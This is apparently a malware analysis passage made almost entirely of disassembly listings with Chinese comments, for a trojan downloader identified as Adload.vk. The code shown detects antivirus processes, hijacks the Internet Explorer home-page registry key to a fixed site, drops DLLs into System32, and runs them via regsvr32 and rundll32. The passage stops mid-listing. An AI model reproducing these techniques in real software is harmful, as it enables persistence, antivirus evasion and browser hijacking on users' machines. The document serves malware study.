00404000 /$ B8 0C194000 MOV EAX,复件_123.0040190C 00404005 |. E8 E6D5FFFF CALL 复件_123.004015F0 0040400A |. 81EC 2C010000 SUB ESP,12C 00404010 |. 56 PUSH ESI 00404011 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 00404014 |. E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 00404019 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 0040401D |. 6A 00 PUSH 0 ; /ProcessID = 0 0040401F |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS 00404021 |. E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot //创建进程快照准备查找进程 00404026 |. 8BF0 MOV ESI,EAX 00404028 |. 8D85 C8FEFFFF LEA EAX,DWORD PTR SS:[EBP-138] 0040402E |. 50 PUSH EAX ; /pProcessentry 0040402F |. 56 PUSH ESI ; |hSnapshot 00404030 |. C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128 ; | 0040403A |. E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First 0040403F |> 85C0 /TEST EAX,EAX 00404041 |. 74 3D |JE SHORT 复件_123.00404080 00404043 |. 8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:[EBP-114] 00404049 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10] 0040404C |. 50 |PUSH EAX 0040404D |. E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB> 00404052 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10] 00404055 |. E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri> 0040405A |. 68 74E24300 |PUSH 复件_123.0043E274 ; ASCII "ravmond.exe" 0040405F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10] 00404062 |. E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q> 00404067 |. 83F8 FF |CMP EAX,-1 0040406A |. 75 0F |JNZ SHORT 复件_123.0040407B 0040406C |. 8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-138] 00404072 |. 50 |PUSH EAX ; /pProcessentry 00404073 |. 56 |PUSH ESI ; |hSnapshot 00404074 |. E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next 00404079 |.^ EB C4 \JMP SHORT 复件_123.0040403F 0040407B |> 6A 01 PUSH 1 0040407D |. 5E POP ESI 0040407E |. EB 09 JMP SHORT 复件_123.00404089 00404080 |> 56 PUSH ESI ; /hObject 00404081 |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle 00404087 |. 33F6 XOR ESI,ESI 00404089 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 0040408D |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 00404090 |. E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 00404095 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00404098 |. 8BC6 MOV EAX,ESI 0040409A |. 5E POP ESI 0040409B |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX 004040A2 |. C9 LEAVE 004040A3 \. C3 RETN
代码:
00404389 /$ 55 PUSH EBP 0040438A |. 8BEC MOV EBP,ESP 0040438C |. 81EC 30020000 SUB ESP,230 00404392 |. 53 PUSH EBX 00404393 |. 33DB XOR EBX,EBX 00404395 |. 53 PUSH EBX ; /ProcessID = 0 00404396 |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS 00404398 |. E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot 0040439D |. 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C] 004043A3 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX 004043A6 |. 51 PUSH ECX ; /pProcessentry 004043A7 |. 50 PUSH EAX ; |hSnapshot 004043A8 |. C785 D4FEFFFF>MOV DWORD PTR SS:[EBP-12C],128 ; | 004043B2 |. E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First 004043B7 |. 85C0 TEST EAX,EAX 004043B9 |. 74 70 JE SHORT 复件_123.0040442B 004043BB |. 56 PUSH ESI 004043BC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA 004043C2 |. 57 PUSH EDI 004043C3 |. BF F0E34300 MOV EDI,复件_123.0043E3F0 ; ASCII "Find 360 Process" 004043C8 |> 8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:[EBP-108] 004043CE |. 68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe" 004043D3 |. 50 |PUSH EAX ; |s1 004043D4 |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr 004043DA |. 59 |POP ECX 004043DB |. 85C0 |TEST EAX,EAX 004043DD |. 59 |POP ECX 004043DE |. 75 18 |JNZ SHORT 复件_123.004043F8 004043E0 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] 004043E6 |. 68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE" 004043EB |. 50 |PUSH EAX ; |s1 004043EC |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr 004043F2 |. 59 |POP ECX 004043F3 |. 85C0 |TEST EAX,EAX 004043F5 |. 59 |POP ECX 004043F6 |. 74 1E |JE SHORT 复件_123.00404416 004043F8 |> 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108] 004043FE |. 50 |PUSH EAX ; /src 004043FF |. 8D85 D0FDFFFF |LEA EAX,DWORD PTR SS:[EBP-230] ; | 00404405 |. 50 |PUSH EAX ; |dest 00404406 |. E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy 0040440B |. 8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:[EBP-124] 00404411 |. 59 |POP ECX 00404412 |. 59 |POP ECX 00404413 |. 57 |PUSH EDI 00404414 |. FFD6 |CALL ESI 00404416 |> 8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:[EBP-12C] 0040441C |. 50 |PUSH EAX ; /pProcessentry 0040441D |. FF75 FC |PUSH DWORD PTR SS:[EBP-4] ; |hSnapshot 00404420 |. E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next 00404425 |. 85C0 |TEST EAX,EAX 00404427 |.^ 75 9F \JNZ SHORT 复件_123.004043C8 00404429 |. 5F POP EDI 0040442A |. 5E POP ESI 0040442B |> FF75 FC PUSH DWORD PTR SS:[EBP-4] ; /hObject 0040442E |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle 00404434 |. 33C0 XOR EAX,EAX 00404436 |. 3BC3 CMP EAX,EBX 00404438 |. 5B POP EBX 00404439 |. 1BC0 SBB EAX,EAX 0040443B |. F7D8 NEG EAX 0040443D |. C9 LEAVE 0040443E \. C3 RETN
HKEY_CLASSES_ROOTCLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
代码:
004041DA /$ B8 20194000 MOV EAX,123.00401920 004041DF |. E8 0CD4FFFF CALL 123.004015F0 004041E4 |. 81EC 14020000 SUB ESP,214 004041EA |. 56 PUSH ESI 004041EB |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 004041EE |. E8 0ACFFFFF CALL 123.004010FD 004041F3 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 004041F7 |. BE 04010000 MOV ESI,104 004041FC |. 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220] 00404202 |. 56 PUSH ESI ; /BufSize = 104 (260.) 00404203 |. 50 PUSH EAX ; |Buffer 00404204 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA //获取windows系统目录 0040420A |. 56 PUSH ESI ; /n => 104 (260.) 0040420B |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; | 00404211 |. 6A 00 PUSH 0 ; |c = 00 00404213 |. 50 PUSH EAX ; |s 00404214 |. E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset 00404219 |. 8A85 E0FDFFFF MOV AL,BYTE PTR SS:[EBP-220] 0040421F |. 68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE" 00404224 |. 8885 E5FEFFFF MOV BYTE PTR SS:[EBP-11B],AL ; | 0040422A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; | 00404230 |. 50 PUSH EAX ; |dest 00404231 |. C685 E4FEFFFF>MOV BYTE PTR SS:[EBP-11C],22 ; | 00404238 |. E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 0040423D |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] 00404243 |. 68 44E34300 PUSH 123.0043E344 ; /src = """ 00404248 |. 50 PUSH EAX ; |dest 00404249 |. E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 0040424E |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] 00404254 |. 68 40E34300 PUSH 123.0043E340 ; /src = " " 00404259 |. 50 PUSH EAX ; |dest 0040425A |. E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 0040425F |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] 00404265 |. 68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn" 0040426A |. 50 PUSH EAX ; |dest 0040426B |. E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 00404270 |. 83C4 2C ADD ESP,2C 00404273 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00404276 |. 68 E0E24300 PUSH 123.0043E2E0 ; ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" 0040427B |. 68 00000080 PUSH 80000000 00404280 |. E8 E6CEFFFF CALL 123.0040116B //写入到注册表 00404285 |. 85C0 TEST EAX,EAX 00404287 |. 5E POP ESI 00404288 |. 75 11 JNZ SHORT 123.0040429B 0040428A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] 00404290 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 00404293 |. 50 PUSH EAX 00404294 |. 6A 00 PUSH 0 00404296 |. E8 A8DDFFFF CALL 123.00402043 //将IEXPLORE.EXE后添加http://www.rom12580.cn 0040429B |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 0040429F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18] 004042A2 |. E8 8BCEFFFF CALL 123.00401132 //关闭注册表 004042A7 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 004042AA |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX 004042B1 |. C9 LEAVE 004042B2 \. C3 RETN
代码:
0040116B /$ 56 PUSH ESI 0040116C |. 8BF1 MOV ESI,ECX 0040116E |. FF7424 0C PUSH DWORD PTR SS:[ESP+C] 00401172 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8] 00401175 |. E8 38030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 0040117A |. 83C6 04 ADD ESI,4 0040117D |. 56 PUSH ESI ; /pHandle 0040117E |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS 00401183 |. 6A 00 PUSH 0 ; |Reserved = 0 00401185 |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |Subkey 00401189 |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |hKey 0040118D |. FF15 0C504000 CALL DWORD PTR DS:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA 00401193 |. 5E POP ESI 00401194 \. C2 0800 RETN 8
代码:
00402043 /$ 56 PUSH ESI 00402044 |. 8BF1 MOV ESI,ECX 00402046 |. FF7424 0C PUSH DWORD PTR SS:[ESP+C] ; /s 0040204A |. E8 C1F5FFFF CALL <JMP.&MSVCRT.strlen> ; \strlen 0040204F |. 59 POP ECX ; 0012FDC4 00402050 |. 40 INC EAX 00402051 |. 50 PUSH EAX ; /BufSize 00402052 |. FF7424 10 PUSH DWORD PTR SS:[ESP+10] ; |Buffer 00402056 |. 6A 02 PUSH 2 ; |ValueType = REG_EXPAND_SZ 00402058 |. 6A 00 PUSH 0 ; |Reserved = 0 0040205A |. FF7424 18 PUSH DWORD PTR SS:[ESP+18] ; |ValueName 0040205E |. FF76 04 PUSH DWORD PTR DS:[ESI+4] ; |hKey 00402061 |. FF15 00504000 CALL DWORD PTR DS:[<&ADVAPI32.RegSetValu>; \RegSetValueExA 00402067 |. 5E POP ESI 00402068 \. C2 0800 RETN 8
代码:
004030CA /$ 55 PUSH EBP 004030CB |. 8BEC MOV EBP,ESP 004030CD |. 81EC 04010000 SUB ESP,104 004030D3 |. 53 PUSH EBX 004030D4 |. 56 PUSH ESI 004030D5 |. 8B35 4C504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.GetWind>; kernel32.GetWindowsDirectoryA //获取系统目录 004030DB |. 57 PUSH EDI 004030DC |. BF 04010000 MOV EDI,104 004030E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004030E7 |. 57 PUSH EDI ; /BufSize => 104 (260.) 004030E8 |. 50 PUSH EAX ; |Buffer 004030E9 |. FFD6 CALL ESI ; \GetWindowsDirectoryA 004030EB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004030F1 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\" 004030F6 |. 50 PUSH EAX ; |dest 004030F7 |. E8 DCE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 004030FC |. FF35 E8E54300 PUSH DWORD PTR DS:[43E5E8] ; /src = "zrrs1.dll" 00403102 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; | 00403108 |. 50 PUSH EAX ; |dest 00403109 |. E8 CAE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 0040310E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403114 |. 50 PUSH EAX 00403115 |. E8 89E1FFFF CALL 复件_123.004012A3 0040311A |. 8B1D 50504000 MOV EBX,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA 00403120 |. 83C4 14 ADD ESP,14 00403123 |. 85C0 TEST EAX,EAX 00403125 |. 75 16 JNZ SHORT 复件_123.0040313D 00403127 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 0040312D |. 50 PUSH EAX ; /String 0040312E |. FFD3 CALL EBX ; \OutputDebugStringA 00403130 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403136 |. 50 PUSH EAX 00403137 |. E8 17FFFFFF CALL 复件_123.00403053 0040313C |. 59 POP ECX 0040313D |> 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403143 |. 57 PUSH EDI 00403144 |. 50 PUSH EAX 00403145 |. FFD6 CALL ESI 00403147 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 0040314D |. 68 7CE04300 PUSH 复件_123.0043E07C ; /src = "\System32\dllcache\" 00403152 |. 50 PUSH EAX ; |dest 00403153 |. E8 80E4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 00403158 |. FF35 E8E54300 PUSH DWORD PTR DS:[43E5E8] ; /src = "zrrs1.dll" 0040315E |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; | 00403164 |. 50 PUSH EAX ; |dest 00403165 |. E8 6EE4FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 0040316A |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403170 |. 50 PUSH EAX 00403171 |. E8 2DE1FFFF CALL 复件_123.004012A3 00403176 |. 83C4 14 ADD ESP,14 00403179 |. 85C0 TEST EAX,EAX 0040317B |. 75 16 JNZ SHORT 复件_123.00403193 0040317D |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403183 |. 50 PUSH EAX 00403184 |. FFD3 CALL EBX 00403186 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 0040318C |. 50 PUSH EAX 0040318D |. E8 C1FEFFFF CALL 复件_123.00403053 00403192 |. 59 POP ECX 00403193 |> 5F POP EDI 00403194 |. 5E POP ESI 00403195 |. 5B POP EBX 00403196 |. C9 LEAVE 00403197 \. C3 RETN
代码:
00403211 /$ B8 B4184000 MOV EAX,复件_123.004018B4 00403216 |. E8 D5E3FFFF CALL 复件_123.004015F0 0040321B |. 51 PUSH ECX 0040321C |. 51 PUSH ECX 0040321D |. 56 PUSH ESI 0040321E |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 00403221 |. E8 7AE2FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> 00403226 |. 33F6 XOR ESI,ESI 00403228 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall" 0040322D |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 00403230 |. 8975 FC MOV DWORD PTR SS:[EBP-4],ESI 00403233 |. E8 7AE2FFFF CALL <JMP.&MFC42.#860_??4CString@@QAEABV> 00403238 |. 51 PUSH ECX 00403239 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040323C |. 8BCC MOV ECX,ESP 0040323E |. 8965 EC MOV DWORD PTR SS:[EBP-14],ESP 00403241 |. 50 PUSH EAX 00403242 |. E8 5BE3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB> 00403247 |. E8 4CFFFFFF CALL 复件_123.00403198 0040324C |. 3BC6 CMP EAX,ESI 0040324E |. 59 POP ECX 0040324F |. 75 19 JNZ SHORT 复件_123.0040326A 00403251 |. 51 PUSH ECX 00403252 |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 00403255 |. 8BCC MOV ECX,ESP 00403257 |. 8965 EC MOV DWORD PTR SS:[EBP-14],ESP 0040325A |. 50 PUSH EAX 0040325B |. E8 42E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB> 00403260 |. E8 74FFFFFF CALL 复件_123.004031D9 00403265 |. 3BC6 CMP EAX,ESI 00403267 |. 59 POP ECX 00403268 |. 74 1C JE SHORT 复件_123.00403286 0040326A |> 51 PUSH ECX 0040326B |. 8D45 F0 LEA EAX,DWORD PTR SS:[EBP-10] 0040326E |. 8BCC MOV ECX,ESP 00403270 |. 8965 EC MOV DWORD PTR SS:[EBP-14],ESP 00403273 |. 50 PUSH EAX 00403274 |. E8 29E3FFFF CALL <JMP.&MFC42.#535_??0CString@@QAE@AB> 00403279 |. E8 77FFFFFF CALL 复件_123.004031F5 0040327E |. 3BC6 CMP EAX,ESI 00403280 |. 59 POP ECX 00403281 |. 74 03 JE SHORT 复件_123.00403286 00403283 |. 6A 01 PUSH 1 00403285 |. 5E POP ESI 00403286 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF 0040328A |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10] 0040328D |. E8 1AE2FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> 00403292 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] 00403295 |. 8BC6 MOV EAX,ESI 00403297 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX 0040329E |. 5E POP ESI 0040329F |. C9 LEAVE 004032A0 \. C3 RETN
病毒名:Trojan-Downloader.Win32.Adload.vk(微点定义)
代码:
004033B1 /$ 55 PUSH EBP 004033B2 |. 8BEC MOV EBP,ESP 004033B4 |. 81EC 08020000 SUB ESP,208 004033BA |. 56 PUSH ESI 004033BB |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004033C1 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.) 004033C6 |. 50 PUSH EAX ; |Buffer 004033C7 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA 004033CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004033D3 |. 68 90E04300 PUSH 复件_123.0043E090 ; /src = "\System32\" 004033D8 |. 50 PUSH EAX ; |dest 004033D9 |. E8 FAE1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 004033DE |. FF35 E4E54300 PUSH DWORD PTR DS:[43E5E4] ; /src = "iksii.dll" 004033E4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; | 004033EA |. 50 PUSH EAX ; |dest = "C:\windows\System32\" 004033EB |. E8 E8E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 004033F0 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004033F6 |. 50 PUSH EAX 004033F7 |. E8 A7DEFFFF CALL 复件_123.004012A3 004033FC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA 00403402 |. 83C4 14 ADD ESP,14 00403405 |. 85C0 TEST EAX,EAX 00403407 |. 75 16 JNZ SHORT 复件_123.0040341F 00403409 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 0040340F |. 50 PUSH EAX ; /String 00403410 |. FFD6 CALL ESI ; \OutputDebugStringA 00403412 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403418 |. 50 PUSH EAX 00403419 |. E8 E1FEFFFF CALL 复件_123.004032FF 0040341E |. 59 POP ECX 0040341F |> 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] 00403425 |. 68 C4E04300 PUSH 复件_123.0043E0C4 ; /src = "regsvr32 /s " 0040342A |. 50 PUSH EAX ; |dest 0040342B |. E8 A2E1FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy 00403430 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00403436 |. 50 PUSH EAX ; /src 00403437 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] ; | 0040343D |. 50 PUSH EAX ; |dest 0040343E |. E8 95E1FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 00403443 |. 83C4 10 ADD ESP,10 00403446 |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] 0040344C |. 50 PUSH EAX 0040344D |. FFD6 CALL ESI 0040344F |. 8D85 F8FDFFFF LEA EAX,DWORD PTR SS:[EBP-208] 00403455 |. 50 PUSH EAX 00403456 |. E8 1BFFFFFF CALL 复件_123.00403376 0040345B |. 59 POP ECX 0040345C |. 5E POP ESI 0040345D |. C9 LEAVE 0040345E \. C3 RETN
代码:
004032A1 /$ 55 PUSH EBP 004032A2 |. 8BEC MOV EBP,ESP 004032A4 |. 81EC 04010000 SUB ESP,104 004032AA |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004032B0 |. 68 B8E04300 PUSH 复件_123.0043E0B8 ; /src = "rundll32 " 004032B5 |. 50 PUSH EAX ; |dest 004032B6 |. E8 17E3FFFF CALL <JMP.&MSVCRT.strcpy> ; \strcpy 004032BB |. FF35 E8E54300 PUSH DWORD PTR DS:[43E5E8] ; /src = "zrrs1.dll" 004032C1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] ; | 004032C7 |. 50 PUSH EAX ; |dest 004032C8 |. E8 0BE3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 004032CD |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004032D3 |. 68 A8E04300 PUSH 复件_123.0043E0A8 ; /src = " , InstallMyDll" 004032D8 |. 50 PUSH EAX ; |dest 004032D9 |. E8 FAE2FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat 004032DE |. 83C4 18 ADD ESP,18 004032E1 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004032E7 |. 50 PUSH EAX ; /String 004032E8 |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA 004032EE |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004032F4 |. 6A 05 PUSH 5 ; /ShowState = SW_SHOW 004032F6 |. 50 PUSH EAX ; |CmdLine 004032F7 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec //到此进程多了一个rundll32.exe 004032FD |. C9 LEAVE 004032FE \. C3 RETN
代码:
00401077 /$ 55 PUSH EBP 00401078 |. 8BEC MOV EBP,ESP 0040107A |. 81EC 04010000 SUB ESP,104 00401080 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00401086 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.) 0040108B |. 50 PUSH EAX ; |Buffer 0040108C |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA 00401092 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 00401098 |. 68 30004100 PUSH 复件_123.00410030 ; /src = "\system32\" 0040109D |. 50 PUSH EAX ; |dest 0040109E |. E8 35050000 CALL <JMP.&MSVCRT.strcat> ; \strcat 004010A3 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004010A9 |. 68 24004100 PUSH 复件_123.00410024 ; /src = "xxggyu.exe" 004010AE |. 50 PUSH EAX ; |dest 004010AF |. E8 24050000 CALL <JMP.&MSVCRT.strcat> ; \strcat 004010B4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004010BA |. 50 PUSH EAX 004010BB |. E8 E3010000 CALL 复件_123.004012A3 004010C0 |. 83C4 14 ADD ESP,14 004010C3 |. 85C0 TEST EAX,EAX 004010C5 |. 75 1A JNZ SHORT 复件_123.004010E1 004010C7 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004010CD |. 50 PUSH EAX ; /String 004010CE |. FF15 50504000 CALL DWORD PTR DS:[<&KERNEL32.OutputDebu>; \OutputDebugStringA 004010D4 |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004010DA |. 50 PUSH EAX 004010DB |. E8 20FFFFFF CALL 复件_123.00401000 004010E0 |. 59 POP ECX 004010E1 |> 68 C8000000 PUSH 0C8 ; /Timeout = 200. ms 004010E6 |. FF15 54504000 CALL DWORD PTR DS:[<&KERNEL32.Sleep>] ; \Sleep 004010EC |. 8D85 FCFEFFFF LEA EAX,DWORD PTR SS:[EBP-104] 004010F2 |. 6A 01 PUSH 1 ; /ShowState = SW_SHOWNORMAL 004010F4 |. 50 PUSH EAX ; |CmdLine 004010F5 |. FF15 58504000 CALL DWORD PTR DS:[<&KERNEL32.WinExec>] ; \WinExec // 004010FB |. C9 LEAVE 004010FC \. C3 RETN
代码:
004040A4 /$ 55 PUSH EBP 004040A5 |. 8BEC MOV EBP,ESP 004040A7 |. 81EC 14090000 SUB ESP,914 004040AD |. 53 PUSH EBX 004040AE |. 56 PUSH ESI 004040AF |. 57 PUSH EDI 004040B0 |. 6A 40 PUSH 40 004040B2 |. 33DB XOR EBX,EBX 004040B4 |. 59 POP ECX 004040B5 |. 33C0 XOR EAX,EAX 004040B7 |. 8DBD EDFEFFFF LEA EDI,DWORD PTR SS:[EBP-113] 004040BD |. 889D ECFEFFFF MOV BYTE PTR SS:[EBP-114],BL 004040C3 |. 889D ECF6FFFF MOV BYTE PTR SS:[EBP-914],BL 004040C9 |. F3:AB REP STOS DWORD PTR ES:[EDI] 004040CB |. 66:AB STOS WORD PTR ES:[EDI] 004040CD |. AA STOS BYTE PTR ES:[EDI] 004040CE |. B9 FF010000 MOV ECX,1FF 004040D3 |. 33C0 XOR EAX,EAX 004040D5 |. 8DBD EDF6FFFF LEA EDI,DWORD PTR SS:[EBP-913] 004040DB |. BE D4E24300 MOV ESI,复件_123.0043E2D4 ; ASCII "375O540.bat" 004040E0 |. F3:AB REP STOS DWORD PTR ES:[EDI] 004040E2 |. 66:AB STOS WORD PTR ES:[EDI] 004040E4 |. AA STOS BYTE PTR ES:[EDI] 004040E5 |. 8D7D F4 LEA EDI,DWORD PTR SS:[EBP-C] 004040E8 |. 8D85 ECFEFFFF LEA EAX,DWORD PTR SS:[EBP-114] 004040EE |. A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES> 004040EF |. A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES> 004040F0 |. 68 04010000 PUSH 104 ; /BufSize = 104 (260.) 004040F5 |. 50 PUSH EAX ; |PathBuffer 004040F6 |. 53 PUSH EBX ; |hModule => NULL 004040F7 |. A5 MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ES>; | 004040F8 |. FF15 28504000 CALL DWORD PTR DS:[<&KERNEL32.GetModuleF>; \GetModuleFileNameA 004040FE |. 8D85 ECF6FFFF LEA EAX,DWORD PTR SS:[EBP-914] 00404104 |. 68 C8E24300 PUSH 复件_123.0043E2C8 ; /String2 = "@echo off" 00404109 |. 50 PUSH EAX ; |String1 0040410A |. FF15 40504000 CALL DWORD PTR DS:[<&KERNEL32.lstrcpyA>] ; 